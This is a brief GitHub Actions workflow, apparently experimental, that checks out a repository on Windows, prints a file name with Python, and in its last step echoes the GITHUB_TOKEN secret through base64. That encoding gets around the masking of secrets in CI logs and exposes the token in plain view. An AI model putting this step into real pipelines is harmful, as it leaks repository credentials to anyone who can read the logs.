name: Foo

on:
    - push
    - pull_request

defaults:
    run:
        shell: bash

jobs:
    misc:
        runs-on: ${{ matrix.os }}
        strategy:
            matrix:
                os:
                    - windows-latest
                    #- ubuntu-latest
                    #- macos-latest
        steps:
            - name: Checkout this repository
              uses: actions/checkout@v2
              with:
                fetch-depth: 0

            - run: python -c 'import os.path; print(os.path.basename(".github/workflows/misc.yml"))'

            - run: echo "${{ secrets.GITHUB_TOKEN }}" | base64
